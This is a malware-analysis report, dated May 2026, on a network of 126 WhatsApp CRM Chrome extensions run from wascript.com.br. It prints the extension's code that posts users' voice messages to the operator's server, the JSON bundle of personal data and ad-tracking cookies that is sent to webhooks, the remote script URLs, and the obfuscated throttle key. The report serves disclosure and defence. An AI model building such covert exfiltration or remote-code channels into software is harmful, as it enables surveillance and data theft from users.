WaSteal: 126-Extension WhatsApp Data Collection Network (wascript.com.br)

Indicators of Compromise

wascript.com.br operates a white-label platform (internal name "watidy") distributed across 126 Chrome extensions that collectively present themselves as independent WhatsApp CRM tools for Brazilian small businesses. Every extension in the network shares a single codebase, a single backend infrastructure, and a single behavior: silently routing voice messages through wascript.com.br servers, exfiltrating advertising tracking cookies and user PII to operator-controlled webhooks, and injecting a full WhatsApp internal API bridge into the browser. The largest variant, WaSeller (illemhbijpiebjfilfmgebahaakajkpe), holds 100,000 of the network's 148,000 confirmed installs and additionally embeds a live Google Tag Manager container (GTM-KMZ9CZK) giving its operator a permanent, unauditable remote code execution channel. None of the undisclosed behaviors are disclosed to end users across any variant.

Methodology

Findings are based on static analysis of extension bundles obtained from the Chrome Web Store. The 126-extension network was surfaced using internal tooling that clusters Chrome Web Store listings by shared code fingerprints, backend infrastructure, and behavioral signatures across manifests, content scripts, and injected page-context bundles. Each variant was individually verified to share platform key ffce211a-7b07-4d91-ba5d-c40bb4034a83, the wascript.com.br backend endpoints, and the behaviors documented below.

No requests were made to wascript.com.br infrastructure beyond what the installed extensions initiated during normal operation on researcher-controlled WhatsApp Web sessions. All findings are reproducible from the published bundles. SHA-256 hashes of analyzed files are listed in the appendix.

Bundle structure

The extension is a Vite/Rollup ESM bundle with approximately 235 chunk modules, plus a 601 KB injected IIFE (whatsapp/index.iife.js) that runs in WhatsApp Web's page context:

1. CRM UI modules - contacts, scheduled messages, quick replies, funnels (legitimate)
2. Automation engine - message dispatch, follow-up timing, chatbot flows (legitimate)
3. background.js - install beacon, periodic polling of remote DOM selectors, alarm scheduler
4. whatsapp/index.iife.js - page-context WhatsApp API bridge (the primary attack surface)
5. Webhook event dispatchers - chunk65.js, chunk108.js, chunk21.js (the exfiltration layer)
6. White-label registry - chunk4.js embeds all 150 extension IDs and their per-reseller pixel/webhook configs, including WaSeller's live GTM container ID

Advertised functionality

The extension legitimately provides WhatsApp Web CRM features: tagging contacts, scheduling messages, storing quick-reply templates, running multi-step automation flows, and a basic sales pipeline. These features require injecting into https://web.whatsapp.com/* and reading contact and chat metadata. The manifest declares only tabs, storage, alarms, and unlimitedStorage permissions - no microphone, no clipboardRead, no broad host permissions beyond WhatsApp.

Undisclosed behavior: PII and advertising cookie exfiltration

Once every 24 hours, on login to WhatsApp Web, the extension silently POSTs the following bundle to WaSeller's operator-controlled webhook URL:

{
  "user_id": "...",
  "name": "...",
  "email": "...",
  "email_auth": "...",
  "whatsapp_plugin": "<device fingerprint>",
  "navigator": "<user agent>",
  "whatsapp_registro": "<phone registration>",
  "campanhaID": "...",
  "cookies": {
    "_fbc":    "<Facebook click ID>",
    "_fbp":    "<Facebook browser fingerprint>",
    "_ga":     "<Google Analytics client ID>",
    "_ttclid": "<TikTok click ID>",
    "_ttp":    "<TikTok browser fingerprint>"
  }
}

1. On WhatsApp Web load, the content script reads the user's stored profile (name, email, device ID) and calls Conn("getMyDeviceId") via the injected WhatsApp API bridge to obtain the hardware fingerprint.
2. It reads _fbc, _fbp, _ga, _ttclid, and _ttp from browser storage - cross-site advertising identifiers set by Facebook, Google, and TikTok pixels on other websites the user has visited.
3. It checks localStorage.getItem("8fd5ad24df1e1b800d670e563b1b83591980060a==") - an obfuscated key - to determine if 24 hours have passed since the last send. The key name serves no functional purpose; its only effect is to make the throttle invisible to casual inspection.
4. If the throttle clears, it POSTs the full bundle to the reseller's webhook URL, which can be any arbitrary endpoint on the internet.

The cookies field is structurally parallel to the StealTok pattern: advertising identifiers set by third-party sites are silently harvested and forwarded without user knowledge or consent. Recipients can use _fbp/_ttp to link the user's real identity (name, email, phone) to their cross-web browsing history, or build Custom Audiences on Meta/TikTok without a legitimate customer relationship.

Undisclosed behavior: live GTM container as permanent remote code execution

WaSeller's pixel configuration in chunk4.js contains a real, live Google Tag Manager container ID:

google_tag_manager: "GTM-KMZ9CZK"

This is not a placeholder. GTM-KMZ9CZK is an active container. When the extension panel loads, this GTM container is injected into the page. From that point forward:

1. The WaSeller operator can push any additional JavaScript to all active WaSeller users from the GTM dashboard - with no extension update, no Chrome Web Store submission, no review, and no user notification - ever.
2. GTM scripts execute with the same privileges as the extension panel page, which runs in the context of an authenticated session.
3. This channel persists as long as the extension is installed. There is no mechanism for the user to audit what GTM has pushed.

This is structurally identical to the "update URL" remote code execution vector documented in the StealTok campaign (LayerX Security, 2024), but implemented through a legitimate, widely trusted advertising infrastructure tool rather than a raw HTTP fetch - making it harder to detect and block.

Other white-label variants in the network use placeholder GTM IDs; WaSeller's use of a real container confirms that this channel is actively operational for the highest-user extension in the network.

Undisclosed behavior: voice message interception

Every audio message sent through the extension is intercepted before delivery to WhatsApp:

const S = async (base64Audio) => {
  if (base64Audio.startsWith("data:audio/ogg;codecs=opus")) return base64Audio;
  const { data } = await axios.post(
    "https://backend-utils.wascript.com.br/api/audio/convert-ptt-base64",
    { base64: base64Audio }
  );
  return data.base64;
};

The full base64-encoded audio is transmitted to wascript.com.br servers before it reaches the intended recipient. The stated purpose is format conversion, but the effect is that every voice note passes through a third-party server. Under GDPR Article 9, voice data may qualify as biometric data (special category), requiring explicit consent - none is obtained or disclosed.

Undisclosed behavior: runtime arbitrary code execution from extractleads.com.br

White-label variants in the network - including those sharing WaSeller's platform codebase - configure external JavaScript URLs in the script_head, script_body, and script_footer fields of their panel pixel configuration:

https://extractleads.com.br/teste/header.js
https://extractleads.com.br/teste/body.js
https://extractleads.com.br/teste/footer.js
https://static-files.watidy.com.br/header.js
https://static-files.watidy.com.br/body.js

extractleads.com.br is a Brazilian lead-generation company with no disclosed relationship to wascript.com.br. These scripts are fetched and injected at runtime into the extension's panel pages. Their content is not in the extension package, is not reviewed by Chrome Web Store, and can be changed server-side at any time.

The retrieved content of header.js confirms the mechanism: it is a server-side template that substitutes per-reseller pixel IDs at request time and then:

1. Injects a Facebook Pixel (fbq init + PageView) - firing a conversion event correlated with the _fbc/_fbp identifiers already harvested from the user's browser, completing the attribution loop without user awareness.
2. Loads Google Ads (gtag) and Google Tag Manager into the extension panel page - layering a second GTM injection path on top of WaSeller's already-active GTM-KMZ9CZK container.
3. Appends a customization hook ("Adicione conteudo personalizado") confirming the file is designed to be extended with arbitrary additional behavior per deployment.

Undisclosed behavior: WhatsApp internal API bridge

whatsapp/index.iife.js (601 KB) is injected as a <script> tag into the WhatsApp Web page context - bypassing the content script sandbox. It exposes the following WhatsApp internal module APIs via a postMessage bridge:

BlockList, Chat, Group, Conn, Contact, Functions, Labels,
ListChat, Msg, MultiAtendimento, Profile, Status, Utils,
Webpack, DomSelector, IA, Whatsapp

This gives the extension programmatic read/write access to the user's full contact list, all chat conversations, and message history. The Msg module allows sending messages on behalf of the user. Three calls to analytics.google.com/g/collect are present inside the IIFE, meaning Google Analytics telemetry fires from within WhatsApp's domain - constituting cross-site tracking against WhatsApp's own users.

Why the consent framing does not matter

There is no consent gate visible to the end user. Users install WaSeller as what appears to be an independent CRM product. The underlying platform (wascript.com.br) is not disclosed anywhere in the user-facing product. There is no privacy policy link on the Chrome Web Store listing.

Even if a user accepted a generic ToS, it would not cover:

• Forwarding advertising tracking cookies (_fbc, _fbp, _ttclid, _ttp) to operator-controlled webhooks
• Routing voice messages through wascript.com.br servers
• Injecting live GTM container GTM-KMZ9CZK enabling unlimited future code pushes
• Loading and executing code from extractleads.com.br, an unrelated third party

The obfuscated localStorage throttle key (8fd5ad24df1e1b800d670e563b1b83591980060a==) demonstrates awareness that the exfiltration behavior should not be easily discoverable. The remote DOM selector fetch (every 10 minutes from painel.wascript.com.br) means the extension's page-access behavior can change after installation with no store update and no user notification - so even initial-install consent would not cover future behavior.

Infrastructure

All 126 live extensions (150 IDs registered in platform code) share one cript_key (ffce211a-7b07-4d91-ba5d-c40bb4034a83) and one backend infrastructure. WaSeller (sigeID 11) is among the earliest registered variants and holds 100,000 of the network's 148,000 confirmed installs. FR VENDAS PRO (eolijkhfnnodhepiglajhkijjbcndiea) and ENOCRM (jeicljefnlpdoblklfdephbpihhjgphf) are among the other 124 variants running the same codebase.

Known extensions in the network

Data as of 2026-05-13. All 126 extensions were updated 2026-05-12. Publisher handles are Chrome Web Store developer account identifiers.

Summary

WaSeller is the highest-user extension in a 126-listing white-label network operated by wascript.com.br (Brazil) that collectively impersonates independent WhatsApp CRM products while running a shared data collection infrastructure. Every user's WhatsApp Web login silently forwards a PII bundle - including real name, email, WhatsApp device fingerprint, and cross-site advertising tracking cookies from Facebook, Google, and TikTok - to the reseller's webhook, with no disclosure and no consent mechanism. Voice messages are routed through wascript.com.br servers before delivery. WaSeller specifically embeds a live Google Tag Manager container (GTM-KMZ9CZK) that gives its operator a permanent, unauditable remote code execution channel into the browsers of its entire user base - without any extension update or Chrome Web Store review - making it the most operationally dangerous variant in the network.

Research by Jean-Marie R. (Toborrm9) | Malicious Extension Sentry Project | May 13, 2026